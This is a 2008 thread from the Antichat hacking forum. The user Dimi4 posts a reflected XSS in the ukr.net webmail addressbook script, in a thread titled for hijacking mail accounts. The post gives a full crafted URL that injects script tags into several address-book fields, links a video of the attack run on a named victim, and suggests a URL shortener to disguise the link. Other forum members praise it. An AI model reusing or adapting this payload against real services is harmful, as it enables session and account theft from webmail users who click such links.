Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Video.Antichat (https://forum.antichat.xyz/forumdisplay.php?f=22)
-   -   [Угон] Почта на ukr.net (https://forum.antichat.xyz/showthread.php?t=87198)

Dimi4 02.10.2008 17:24
[Угон] Почта на ukr.net
 
Хакеры! Там нет ничево интересного! просьба не смотреть!
Всем привет. Это мое первое видео :) . Сегодня мною была обнаружена пассивная хсс на сервисе ukr.net - http://freemail.ukr.net

Причина: Отсутствие\плохая фильтрация в скрипте "аddressbook"

Условия: Жертва должна быть залогинена. Жертва должна пройти по специально сформированой ссылке.

Пример:

Цитата:
_ttp://freemail.ukr.net/q/addressbook?mode=edit&id=&LastName="><script>alert (/xek/)</script>&FirstName=%22%3E%3Cscript%3Ealert%28%2Fby+ %2F%29%3C%2Fscript%3E&NickName=%22%3E%3Cscript%3Ea lert%28%2Fxek+by+Dimi4%2F%29%3C%2Fscript%3E&Email= %22%3E%3Cscript%3Ealert%28%2Fxek+by+Dimi4%2F%29%3C %2Fscript%3E&MobilePhone=%22%3E%3Cscript%3Ealert%2 8%2FDimi4%2F%29%3C%2Fscript%3E&submit=%C4%EE%E1%E0 %E2%E8%F2%FC
Видео:
Цитата:
http://rapidshare.com/files/150250737/ukr.net.rar.html
В роли жертвы - T-Rey
П.С. Пошол отправлять на video.antichat.net :)
П.П.С Слишком долгая ссылка? www.tiny.cc
(c) Dimi4

Exlibris 02.10.2008 18:08
хеккер штоле?

BlackSun 02.10.2008 18:12
Как бе под пассивные ксс на почтовых сервисах есть отдельная ветка .. зачем еще и видео снимать?
http://forum.antichat.ru/lastpostinthread21437.html

Dimi4 02.10.2008 18:14
http://video.antichat.ru/1_0.html

br3k 02.10.2008 18:16
Хаха, T-Rey'a развели : )
Молодец, +.

UnDRaux 02.10.2008 18:22
Dimi4 молодцом! (с) Хэнкок.


Время: 10:01